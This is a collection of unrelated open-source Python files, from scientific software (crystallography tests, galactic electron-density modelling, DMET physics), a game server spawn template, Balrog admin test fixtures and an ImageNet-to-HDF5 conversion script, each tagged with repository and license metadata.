for e1, e2 in zip(s1.get_epochs(), s2.get_epochs()):
assert abs(e1 - e2) < EPS
# Check the detector
d1 = exp1.detector
d2 = exp2.detector
assert len(d1) == len(d2)
for p1, p2 in zip(d1, d2):
assert p1.get_type() == p2.get_type()
assert p1.get_material() == p2.get_material()
assert p1.get_thickness() == p2.get_thickness()
assert p1.get_image_size() == p2.get_image_size()
assert p1.get_pixel_size() == p2.get_pixel_size()
assert p1.get_trusted_range() == p2.get_trusted_range()
for x1, x2 in zip(p1.get_fast_axis(), p2.get_fast_axis()):
assert abs(x1 - x2) < EPS
for x1, x2 in zip(p1.get_slow_axis(), p2.get_slow_axis()):
assert abs(x1 - x2) < EPS
for x1, x2 in zip(p1.get_origin(), p2.get_origin()):
assert abs(x1 - x2) < EPS
# Check the crystal
c1 = exp1.crystal
c2 = exp2.crystal
assert c1.get_space_group() == c2.get_space_group()
for p1, p2 in zip(c1.get_unit_cell().parameters(), c2.get_unit_cell().parameters()):
assert abs(p1 - p2) < EPS
for p1, p2 in zip(c1.get_A(), c2.get_A()):
assert abs(p1 - p2) < EPS
assert c1.num_scan_points == c2.num_scan_points
for i in range(c1.num_scan_points):
A1 = c1.get_A_at_scan_point(i)
A2 = c2.get_A_at_scan_point(i)
for a1, a2 in zip(A1, A2):
assert abs(a1 - a2) < EPS
uc1 = c1.get_unit_cell_at_scan_point(i)
uc2 = c2.get_unit_cell_at_scan_point(i)
for p1, p2 in zip(uc1.parameters(), uc2.parameters()):
assert abs(p1 - p2) < EPS
| dials/dials | tests/util/test_nexus.py | Python | bsd-3-clause | 4,907 |
'''
Created on Sep 27, 2013
@author: leal
Default JSON MESSAGES
'''
import ast
import logging
import config.config
logger = logging.getLogger(__name__)
class Messages(object):
'''
classdocs
'''
messageTemplate = """{
'success' : '%r',
'message' : '%s',
'details' : %r
}"""
@staticmethod
def success(message,details=''):
messageAsStr = Messages.messageTemplate%(True,message,details)
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
@staticmethod
def error(message,details=''):
messageAsStr = Messages.messageTemplate%(False,message,details)
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
@staticmethod
def errorDetailed(message,complementaryMessage,value):
details = """{
'message' : %r,
'value' : %r
}"""%(complementaryMessage,value)
messageAsStr = Messages.messageTemplate%(False,message,
ast.literal_eval(details))
logger.debug(messageAsStr)
messageAsDic = ast.literal_eval(messageAsStr)
return messageAsDic
if __name__ == '__main__':
Messages.success("OK")
Messages.success("OK", "File received")
Messages.error("Error")
Messages.error("Error",details='There was an error processing XPTO.')
Messages.error("Error adding X.",details={'error' : 'xpto', 'valid' : [1,2,3]})
Messages.errorDetailed("Error adding X.","Valid values are", [1,2,3,5])
| ricleal/reductionServer | src/data/messages.py | Python | gpl-3.0 | 1,661 |
import sys
from services.spawn import MobileTemplate
from services.spawn import WeaponTemplate
from resources.datatables import WeaponType
from resources.datatables import Difficulty
from resources.datatables import Options
from java.util import Vector
def addTemplate(core):
mobileTemplate = MobileTemplate()
mobileTemplate.setCreatureName('merek_harvester')
mobileTemplate.setLevel(63)
mobileTemplate.setDifficulty(Difficulty.NORMAL)
mobileTemplate.setMinSpawnDistance(4)
mobileTemplate.setMaxSpawnDistance(8)
mobileTemplate.setDeathblow(False)
mobileTemplate.setScale(1)
mobileTemplate.setHideType("Leathery Hide")
mobileTemplate.setHideAmount(45)
mobileTemplate.setSocialGroup("merek")
mobileTemplate.setAssistRange(12)
mobileTemplate.setStalker(False)
mobileTemplate.setOptionsBitmask(Options.ATTACKABLE)
templates = Vector()
templates.add('object/mobile/shared_merek.iff')
mobileTemplate.setTemplates(templates)
weaponTemplates = Vector()
weapontemplate = WeaponTemplate('object/weapon/melee/unarmed/shared_unarmed_default.iff', WeaponType.UNARMED, 1.0, 6, 'kinetic')
weaponTemplates.add(weapontemplate)
mobileTemplate.setWeaponTemplateVector(weaponTemplates)
attacks = Vector()
attacks.add('bm_claw_4')
attacks.add('bm_damage_poison_4')
attacks.add('bm_damage_pain_4')
attacks.add('bm_slash_4')
mobileTemplate.setDefaultAttack('creatureMeleeAttack')
mobileTemplate.setAttacks(attacks)
core.spawnService.addMobileTemplate('merek_harvester', mobileTemplate)
return | agry/NGECore2 | scripts/mobiles/endor/merek_harvester.py | Python | lgpl-3.0 | 1,557 |
# DataviewMappingColumn.py
#
# Copyright 2019 OSIsoft, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# <http://www.apache.org/licenses/LICENSE-2.0>
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
class DataviewMappingColumn(object):
"""Sds dataview definition"""
@property
def Name(self):
return self.__name
@Name.setter
def Name(self, name):
self.__name = name
@property
def IsKey(self):
return self.__isKey
@IsKey.setter
def IsKey(self, isKey):
self.__isKey= isKey
@property
def DataType(self):
return self.__dataType
@DataType.setter
def DataType(self, dataType):
self.__dataType = dataType
@property
def MappingRule(self):
return self.__MappingRule
@MappingRule.setter
def MappingRule(self, MappingRule):
self.__MappingRule= MappingRule
def toJson(self):
return json.dumps(self.toDictionary())
def toDictionary(self):
# required properties
dictionary = { 'Name' : self.Name}
dictionary['IsKey'] = self.IsKey
if hasattr(self, 'DataType'):
dictionary['DataType'] = self.DataType
if hasattr(self, 'MappingRule'):
dictionary['MappingRule'] = self.MappingRule
return dictionary
@staticmethod
def fromJson(jsonObj):
return DataviewMappingColumn.fromDictionary(jsonObj)
@staticmethod
def fromDictionary(content):
dataviewMappingColumn = DataviewMappingColumn()
if len(content) == 0:
return dataviewMappingColumn
if 'Name' in content:
dataviewMappingColumn.Name = content['Name']
if 'IsKey' in content:
dataviewMappingColumn.IsKey = content['IsKey']
if 'DataType' in content:
dataviewMappingColumn.DataType = content['DataType']
if 'MappingRule' in content:
dataviewMappingColumn.MappingRule = content['MappingRule']
return dataviewMappingColumn
| osisoft/Qi-Samples | ocs_samples/library_samples/Python3/ocs_sample_library_preview/Dataview/DataviewMappingColumn.py | Python | apache-2.0 | 2,497 |
import logging
import os
import simplejson as json
from tempfile import mkstemp
import unittest
from auslib.global_state import dbo, cache
from auslib.web.admin.base import app
from auslib.blobs.base import createBlob
def setUpModule():
# Silence SQLAlchemy-Migrate's debugging logger
logging.getLogger('migrate').setLevel(logging.CRITICAL)
class ViewTest(unittest.TestCase):
"""Base class for all view tests. Sets up some sample data, and provides
some helper methods."""
def setUp(self):
self.version_fd, self.version_file = mkstemp()
cache.reset()
cache.make_copies = True
app.config["SECRET_KEY"] = 'abc123'
app.config['DEBUG'] = True
app.config["WTF_CSRF_ENABLED"] = False
app.config['WHITELISTED_DOMAINS'] = {'good.com': ('a', 'b', 'c', 'd')}
app.config["VERSION_FILE"] = self.version_file
with open(self.version_file, "w+") as f:
f.write("""
{
"source":"https://github.com/mozilla/balrog",
"version":"1.0",
"commit":"abcdef123456"
}
""")
dbo.setDb('sqlite:///:memory:')
dbo.setDomainWhitelist({'good.com': ('a', 'b', 'c', 'd')})
dbo.create()
dbo.permissions.t.insert().execute(permission='admin', username='bill', data_version=1)
dbo.permissions.t.insert().execute(permission='permission', username='bob', data_version=1)
dbo.permissions.t.insert().execute(permission='release', username='bob',
options=dict(products=['fake', "a", 'b'], actions=["create", "modify"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release_read_only', username='bob', options=dict(actions=["set"], products=["a", "b"]), data_version=1)
dbo.permissions.t.insert().execute(permission='rule', username='bob', options=dict(actions=["modify"], products=['a', "b"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release', username='ashanti', options=dict(actions=["modify"], products=['a']), data_version=1)
dbo.permissions.t.insert().execute(permission="scheduled_change", username="mary", options=dict(actions=["enact"]), data_version=1)
dbo.permissions.t.insert().execute(permission='release_locale', username='ashanti',
options=dict(actions=["modify"], products=['a']), data_version=1)
dbo.permissions.t.insert().execute(permission='admin', username='billy',
options=dict(products=['a']), data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bill", role="releng", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bill", role="qa", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="bob", role="relman", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="julie", role="releng", data_version=1)
dbo.permissions.user_roles.t.insert().execute(username="mary", role="relman", data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="a", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="e", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="j", role="releng", signoffs_required=1, data_version=1)
dbo.productRequiredSignoffs.t.insert().execute(product="fake", channel="k", role="relman", signoffs_required=1, data_version=2)
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=1, changed_by="bill", timestamp=10, product="fake", channel="k", role="relman")
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=2, changed_by="bill", timestamp=11, product="fake", channel="k", role="relman",
signoffs_required=2, data_version=1)
dbo.productRequiredSignoffs.history.t.insert().execute(change_id=3, changed_by="bill", timestamp=25, product="fake", channel="k", role="relman",
signoffs_required=1, data_version=2)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="fake", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="bar", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="blah", role="releng", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="doop", role="releng", signoffs_required=1, data_version=2)
dbo.permissionsRequiredSignoffs.t.insert().execute(product="superfake", role="relman", signoffs_required=1, data_version=1)
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=1, changed_by="bill", timestamp=10, product="doop", role="releng")
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=2, changed_by="bill", timestamp=11, product="doop", role="releng",
signoffs_required=2, data_version=1)
dbo.permissionsRequiredSignoffs.history.t.insert().execute(change_id=3, changed_by="bill", timestamp=25, product="doop", role="releng",
signoffs_required=1, data_version=2)
dbo.releases.t.insert().execute(
name='a', product='a', data=createBlob(dict(name='a', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='ab', product='a', data=createBlob(dict(name='ab', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='b', product='b', data=createBlob(dict(name='b', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(
name='c', product='c', data=createBlob(dict(name='c', hashFunction="sha512", schema_version=1)), data_version=1)
dbo.releases.t.insert().execute(name='d', product='d', data_version=1, data=createBlob("""
{
"name": "d",
"schema_version": 1,
"hashFunction": "sha512",
"platforms": {
"p": {
"locales": {
"d": {
"complete": {
"filesize": 1234,
"from": "*",
"hashValue": "abc"
}
}
}
}
}
}
"""))
dbo.rules.t.insert().execute(
rule_id=1, priority=100, version='3.5', buildTarget='d', backgroundRate=100, mapping='c', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=2, alias="frodo", priority=100, version='3.3', buildTarget='d', backgroundRate=100, mapping='b', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=3, product='a', priority=100, version='3.5', buildTarget='a', backgroundRate=100, mapping='a', update_type='minor',
channel="a", data_version=1
)
dbo.rules.t.insert().execute(
rule_id=4, product='fake', priority=80, buildTarget='d', backgroundRate=100, mapping='a', update_type='minor', channel="a",
data_version=1
)
dbo.rules.t.insert().execute(
rule_id=5, priority=80, buildTarget='d', version='3.3', backgroundRate=0, mapping='c', update_type='minor',
product="a", channel="a", data_version=1
)
dbo.rules.t.insert().execute(rule_id=6, product='fake', priority=40, backgroundRate=50, mapping='a', update_type='minor', channel="e", data_version=1)
dbo.rules.t.insert().execute(rule_id=7, product='fake', priority=30, backgroundRate=85, mapping='a', update_type='minor', channel="c", data_version=1)
self.client = app.test_client()
def tearDown(self):
dbo.reset()
os.close(self.version_fd)
os.remove(self.version_file)
def _getBadAuth(self):
return {'REMOTE_USER': 'NotAuth!'}
def _getHttpRemoteUserAuth(self, username):
return {"HTTP_REMOTE_USER": username}
def _getAuth(self, username):
return {'REMOTE_USER': username}
def _get(self, url, qs={}, username=None):
environ_base = None
headers = {
"Accept-Encoding": "application/json",
"Accept": "application/json"
}
if username:
environ_base = self._getAuth(username)
ret = self.client.get(url, query_string=qs, headers=headers, environ_base=environ_base)
return ret
def _post(self, url, data={}, username='bill', **kwargs):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getAuth(username), **kwargs)
def _httpRemoteUserPost(self, url, username="bill", data={}):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getHttpRemoteUserAuth(username))
def _badAuthPost(self, url, data={}):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.post(url, data=json.dumps(data), content_type="application/json", environ_base=self._getBadAuth())
def _put(self, url, data={}, username='bill'):
if type(data) == dict:
data["csrf_token"] = "lorem"
return self.client.put(url, data=json.dumps(data), content_type="application/json", environ_base=self._getAuth(username))
def _delete(self, url, qs={}, username='bill'):
if type(qs) == dict:
qs["csrf_token"] = "lorem"
return self.client.delete(url, query_string=qs, environ_base=self._getAuth(username))
def assertStatusCode(self, response, expected):
self.assertEquals(response.status_code, expected, '%d - %s' % (response.status_code, response.data))
| aksareen/balrog | auslib/test/admin/views/base.py | Python | mpl-2.0 | 10,366 |
""" Module for I/O
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
from builtins import super
import numpy as np
from astropy.table import Table
from scipy.interpolate import CubicSpline
from . import __path__
DATA_PATH = os.path.join(__path__[0], 'data')
def numpify_dict(d):
"""
Recursively make lists in a dictionary into numpy array
"""
def numpify(d):
for k, v in d.items():
if isinstance(v, list):
d[k] = np.array(v)
elif isinstance(v, dict):
numpify(v)
new_dict = d.copy()
numpify(new_dict)
return new_dict
class Params(dict):
"""
Input parameters
"""
def __init__(self, ifile='ne2001_params.json', path=None, **new_params):
"""
"""
if path is None:
path = DATA_PATH
self.path = path
self.ifile = ifile
try:
params = numpify_dict(parse_json(os.path.join(self.path,
self.ifile)))
params['spiral_arms']['adict'] = init_spiral_arms()
except IOError:
params = {}
params.update(new_params)
super().__init__(params)
def parse_json(json_file):
"Parse json file"
with open(json_file, 'rt') as json_data:
data = json.load(json_data)
return data
def read_galparam(ifile='gal_param.json'):
"""
Read Galaxy parameters
Parameters
----------
ifile : str, optional
Returns
-------
gal_param : dict
"""
old_param = parse_json(os.path.join(DATA_PATH, ifile))
gal_param = {}
gal_param['thick_disk'] = dict(e_density=(old_param['n1h1'] /
old_param['h1']),
height=old_param['h1'],
radius=old_param['A1'],
F=old_param['F1'])
gal_param['thin_disk'] = dict(e_density=old_param['n2'],
height=old_param['h2'],
radius=old_param['A2'],
F=old_param['F2'])
return gal_param
def read_gc(ifile='ne_gc.json'):
""" Read Galactic Center parameters
Returns
-------
gc_param : dict
dict of parameters
"""
old_param = parse_json(os.path.join(DATA_PATH, ifile))
gc_param = {}
gc_param['galactic_center'] = dict(e_density=old_param['negc0'],
center=tuple(old_param['centroid'].
values()),
F=old_param['Fgc0'],
height=old_param['hgc'],
radius=old_param['rgc'])
return gc_param
def read_lism(ifile='ne_lism.json'):
"""
Parameters
----------
ifile : str, optional
Returns
-------
lism_dict : dict
"""
# Read
with open(os.path.join(DATA_PATH, ifile), 'rt') as fh:
lism_dict = json.load(fh)
# Return
return lism_dict
def init_spiral_arms(ifile='ne_arms_log_mod.inp'):
armsinp = os.path.join(DATA_PATH, ifile)
# logarms = DATA_PATH + 'log_arms.out'
narms = 5
# integer armmap(5) ! for remapping from Wainscoat
# data armmap/1, 3, 4, 2, 5/ ! order to TC93 order, which is
# ! from GC outwards toward Sun.
armmap = [1, 3, 4, 2, 5]
NNj = [20, 20, 20, 20, 20]
narmpoints = 500
ncoord = 2
NNmax = 20
rad = 180/np.pi
# Arms
arms_tbl = Table.read(armsinp, format='ascii') # a, rmin, thmin, extent
assert len(arms_tbl) == narms
r1 = np.zeros((NNmax, narms))
th1 = np.zeros((NNmax, narms))
kmax = np.zeros(narms).astype(int)
arm = np.zeros((narms, narmpoints, ncoord))
for j, row in enumerate(arms_tbl):
th1[0:NNj[j], j] = (row['thmin'] +
np.arange(NNj[j])*row['extent']/(NNj[j]-1.)) # rad
r1[:, j] = row['rmin'] * np.exp((th1[:, j]-row['thmin'])/row['a'])
th1[:, j] *= rad # ! deg
# c *** begin sculpting spiral arm 2 == TC arm 3***
if armmap[j] == 3:
cut1 = (th1[:, j] > 370.) & (th1[:, j] <= 410.)
r1[cut1, j] *= (1. + 0.04 * np.cos((th1[cut1, j]-390.)*180 /
(40.*rad)))
# c . (1. + 0.01*cos((th1(n,j)-390.)*180./(40.*rad)))
cut2 = (th1[:, j] > 315.) & (th1[:, j] <= 370.)
r1[cut2, j] *= (1. - 0.07 * np.cos((th1[cut2, j]-345.)*180 /
(55.*rad)))
# c . (1.0 - 0.08*cos((th1(n,j)-345.)*180./(55.*rad)))
cut3 = (th1[:, j] > 180.) & (th1[:, j] <= 315.)
r1[cut3, j] *= (1 + 0.16 * np.cos((th1[cut3, j]-260.)*180 /
(135.*rad)))
# (1 + 0.13* np.cos((th1[cut3,j]-260.)*180./(135.*rad)))
# c *** begin sculpting spiral arm 4 == TC arm 2***
if armmap[j] == 2:
cut1 = (th1[:, j] > 290.) & (th1[:, j] <= 395.)
r1[cut1, j] *= (1. - 0.11 * np.cos((th1[cut1, j]-350.)*180 /
(105.*rad)))
# c *** end arm sculpting ***
"""
open(11,file=logarms, status='unknown')
write(11,*) 'arm n xa ya'
"""
# do 21 j=1,narms
for j in range(narms):
dth = 5.0/r1[0, j] # Python indexing
th = th1[0, j]-0.999*dth
# Generate spline
cspline = CubicSpline(th1[:NNj[j], j], r1[:NNj[j], j])
# call cspline(th1(1,j),r1(1,j),-NNj(j),th,r)
# for k in range(narmpoints):
# do 10 k=1,narmpoints-1
th = th + dth * np.arange(narmpoints)
gd_th = np.where(th <= th1[NNj[j]-1, j])[0]
kmax[j] = np.max(gd_th) + 1 # Python indexing (we will use arange)
r = cspline(th[gd_th])
# x,y of each arm
arm[j, gd_th, 0] = -r*np.sin(th[gd_th]/rad) # Python indexing
arm[j, gd_th, 1] = r*np.cos(th[gd_th]/rad)
# Wrap into a dict
arms_dict = {}
arms_dict['table'] = arms_tbl
arms_dict['r1'] = r1
arms_dict['th1'] = r1
arms_dict['kmax'] = kmax
arms_dict['narms'] = narms
arms_dict['narmpoints'] = narmpoints
arms_dict['armmap'] = armmap
arms_dict['arm'] = arm
return arms_dict
| benbaror/ne2001 | src/ne2001/ne_io.py | Python | bsd-2-clause | 6,520 |
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements writing of parsed, and possibly edited, test data back to files.
This functionality is used by :meth:`robot.parsing.model.TestCaseFile.save`
and indirectly by :mod:`robot.tidy`. External tools should not need to use
this package directly.
This package is considered stable, although the planned changes to
:mod:`robot.parsing` may affect also this package.
"""
from .datafilewriter import DataFileWriter
| alexandrul-ci/robotframework | src/robot/writer/__init__.py | Python | apache-2.0 | 1,065 |
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2019, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
#
import multiprocessing
from concurrent.futures import ProcessPoolExecutor
from functools import partial
from pathlib import Path
import h5py
import numpy as np
from PIL import Image
from tqdm import tqdm
TRAIN_DIR = "train"
VAL_DIR = "val"
# TRAIN_DIR = "sz/160/train"
# VAL_DIR = "sz/160/val"
DATA_PATH = Path("~/nta/data/imagenet").expanduser()
TRAIN_PATH = DATA_PATH / TRAIN_DIR
VAL_PATH = DATA_PATH / VAL_DIR
TRAIN_FILES = TRAIN_PATH.glob("*/*.JPEG")
VAL_FILES = VAL_PATH.glob("*/*.JPEG")
HDF5_FILE = DATA_PATH / "imagenet.hdf5"
def resize(sz, image_path):
with Image.open(image_path) as img:
# Resize image preserving aspect ratio
w, h = img.size
ratio = min(h / sz, w / sz)
resized_img = img.resize((int(w / ratio), int(h / ratio)),
resample=Image.BICUBIC)
return resized_img
def hdf5_save(group_name, lock, image_path):
"""
Save imagenet images to HDF5
:param group_name: top level group name ("train", "val", etc)
:param lock: Lock object used to control write access to hdf5 file
:param image_path: Path object for the image file
"""
image_name = image_path.name
wnid = image_path.parent.name
image_data = image_path.read_bytes()
lock.acquire()
hdf5_file = h5py.File(name=HDF5_FILE, mode="a")
try:
main_group = hdf5_file.require_group(group_name)
wnid_group = main_group.require_group(wnid)
wnid_group.create_dataset(image_name, data=np.void(image_data))
finally:
hdf5_file.close()
lock.release()
return image_name
def main():
with ProcessPoolExecutor(multiprocessing.cpu_count()) as executor, \
multiprocessing.Manager() as manager:
lock = manager.Lock()
hdf5_val = partial(hdf5_save, VAL_DIR, lock)
results = executor.map(hdf5_val, VAL_FILES)
for _ in tqdm(results, desc="Saving validation dataset"):
pass
hdf5_train = partial(hdf5_save, TRAIN_DIR, lock)
results = executor.map(hdf5_train, TRAIN_FILES)
for _ in tqdm(results, desc="Saving training dataset"):
pass
if __name__ == "__main__":
main()
| mrcslws/nupic.research | projects/imagenet/create_imagenet_hdf5.py | Python | agpl-3.0 | 3,040 |
'''
PyDMET: a python implementation of density matrix embedding theory
Copyright (C) 2014, 2015 Sebastian Wouters
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
'''
import HamInterface
import HamFull
import DMETham
import LinalgWrappers
import DMETorbitals
import SolveCorrelated
import MinimizeCostFunction
import DIIS
import numpy as np
class HubbardDMET:
def __init__( self, lattice_size, cluster_size, HubbardU, antiPeriodic, skew2by2cell=False ):
self.lattice_size = lattice_size
self.cluster_size = cluster_size
self.HubbardU = HubbardU
self.antiPeriodic = antiPeriodic
self.skew2by2cell = skew2by2cell
self.impurityOrbs = self.ConstructImpurityOrbitals()
self.impIndices = []
for count in range(0, len(self.impurityOrbs)):
if ( self.impurityOrbs[count] == 1 ):
self.impIndices.append( count )
self.impIndices = np.array( self.impIndices )
self.Ham = HamInterface.HamInterface(self.lattice_size, self.HubbardU, self.antiPeriodic)
def ConstructImpurityOrbitals( self ):
# Set the impurity orbitals lattice-style, e.g. impurityOrbs[row, col] = 1 for 2D lattice
impurityOrbs = np.zeros( self.lattice_size, dtype=int )
if ( self.skew2by2cell ):
impurityOrbs[0, 0] = 1
impurityOrbs[1, 0] = 1
impurityOrbs[1, 1] = 1
impurityOrbs[2, 1] = 1
else:
for count in range(0, np.prod( self.cluster_size )):
copycount = count
co = np.zeros([ len(self.cluster_size) ], dtype=int)
for dim in range(0, len(self.cluster_size )):
co[ dim ] = copycount % self.cluster_size[ dim ]
copycount = ( copycount - co[ dim ] ) / self.cluster_size[ dim ]
impurityOrbs[ tuple(co) ] = 1
impurityOrbs = np.reshape( impurityOrbs, ( np.prod( self.lattice_size ) ), order='F' ) # HamFull assumes fortran
return impurityOrbs
def SolveGroundState( self, Nelectrons, umat_guess=None ):
numImpOrbs = np.sum( self.impurityOrbs )
numBathOrbs = numImpOrbs
assert( Nelectrons % 2 == 0 )
numPairs = Nelectrons / 2
if ( umat_guess == None ):
# Start with a diagonal embedding potential
u_startguess = (1.0 * self.HubbardU * numPairs) / np.prod(self.lattice_size)
umat_new = u_startguess * np.identity( numImpOrbs, dtype=float )
else:
umat_new = np.array( umat_guess, copy=True )
print "DMET :: Starting guess for umat ="
print umat_new
normOfDiff = 1.0
threshold = 1e-6 * numImpOrbs
iteration = 0
theDIIS = DIIS.DIIS(7)
numNonDIIS = 4
while ( normOfDiff >= threshold ):
iteration += 1
print "*** DMET iteration",iteration,"***"
if ( numImpOrbs > 1 ) and ( iteration > numNonDIIS ):
umat_new = theDIIS.Solve()
umat_old = np.array( umat_new, copy=True )
# Augment the Hamiltonian with the embedding potential
HamAugment = HamFull.HamFull(self.Ham, self.cluster_size, umat_new, self.skew2by2cell)
# Get the RHF ground state 1RDM and construct the bath orbitals
energiesRHF, solutionRHF = LinalgWrappers.RestrictedHartreeFock( HamAugment.Tmat, numPairs, True )
groundstate1RDM = DMETorbitals.Construct1RDM_groundstate( solutionRHF, numPairs )
dmetOrbs, NelecEnvironment, DiscOccupation = DMETorbitals.ConstructBathOrbitals( self.impurityOrbs, groundstate1RDM, numBathOrbs )
NelecActiveSpace = Nelectrons - NelecEnvironment # Floating point number
assert( abs( NelecActiveSpace - 2*numImpOrbs ) < 1e-8 ) # For ground-state DMET
NelecActiveSpace = int( round( NelecActiveSpace ) + 0.001 )
# Construct the DMET Hamiltonian and get the exact solution
HamDMET = DMETham.DMETham(self.Ham, HamAugment, dmetOrbs, self.impurityOrbs, numImpOrbs, numBathOrbs)
if (True):
numDMETorbs = HamDMET.getDmetNumOrbitals()
OEI = np.zeros([numDMETorbs, numDMETorbs], dtype=float)
for cnt1 in range(0, numDMETorbs):
for cnt2 in range(0, numDMETorbs):
OEI[cnt1,cnt2] = HamDMET.getTmatCorr(cnt1, cnt2)
energiesDMETOEI, solutionDMETOEI = LinalgWrappers.RestrictedHartreeFock( OEI, NelecActiveSpace/2, True )
print OEI
print energiesDMETOEI - np.average(energiesDMETOEI)
EnergyPerSiteCorr, OneRDMcorr, GSenergyFCI, GSvectorFCI = SolveCorrelated.SolveGS( HamDMET, NelecActiveSpace )
umat_new = MinimizeCostFunction.Minimize( umat_new, OneRDMcorr, HamDMET, NelecActiveSpace )
normOfDiff = np.linalg.norm( umat_new - umat_old )
if ( numImpOrbs > 1 ) and ( iteration >= numNonDIIS ):
error = umat_new - umat_old
error = np.reshape( error, error.shape[0]*error.shape[1] )
theDIIS.append( error, umat_new )
print " DMET :: The energy per site (correlated problem) =",EnergyPerSiteCorr
print " DMET :: The 2-norm of u_new - u_old =",normOfDiff
print "DMET :: Convergence reached. Converged u-matrix:"
print umat_new
print "***************************************************"
return ( EnergyPerSiteCorr , umat_new )
def SolveResponse( self, umat_guess, Nelectrons, omega, eta, numBathOrbs, toSolve, prefactResponseRDM=0.5 ):
# Define a few constants
numImpOrbs = np.sum( self.impurityOrbs )
assert( numBathOrbs >= numImpOrbs )
assert( Nelectrons%2==0 )
numPairs = Nelectrons / 2
assert( (toSolve=='A') or (toSolve=='R') or (toSolve=='F') or (toSolve=='B') ) # LDOS addition/removal or LDDR forward/backward
assert( (prefactResponseRDM>=0.0) and (prefactResponseRDM<=1.0) )
# Set up a few parameters for the self-consistent response DMET
umat_new = np.array( umat_guess, copy=True )
normOfDiff = 1.0
threshold = 1e-6 * numImpOrbs
maxiter = 1000
iteration = 0
theDIIS = DIIS.DIIS(7)
startedDIIS= False
while ( normOfDiff >= threshold ) and ( iteration < maxiter ):
iteration += 1
print "*** DMET iteration",iteration,"***"
if ( numImpOrbs > 1 ) and ( startedDIIS ):
umat_new = theDIIS.Solve()
umat_old = np.array( umat_new, copy=True )
# Augment the Hamiltonian with the embedding potential
HamAugment = HamFull.HamFull(self.Ham, self.cluster_size, umat_new, self.skew2by2cell)
# Get the RHF ground-state 1-RDM
energiesRHF, solutionRHF = LinalgWrappers.RestrictedHartreeFock( HamAugment.Tmat, numPairs, True )
if ( iteration == 1 ):
chemical_potential_mu = 0.5 * ( energiesRHF[ numPairs-1 ] + energiesRHF[ numPairs ] )
if ( toSolve == 'A' ) or ( toSolve == 'R' ):
omegabis = omega + chemical_potential_mu # Shift omega with the chemical potential for the retarded Green's function
else:
omegabis = omega
groundstate1RDM = DMETorbitals.Construct1RDM_groundstate( solutionRHF, numPairs )
# Get the RHF mean-field response 1-RDMs
response1RDMs = []
for orbital_i in self.impIndices:
if (toSolve=='A'):
response1RDM = DMETorbitals.Construct1RDM_addition( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='R'):
response1RDM = DMETorbitals.Construct1RDM_removal( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='F'):
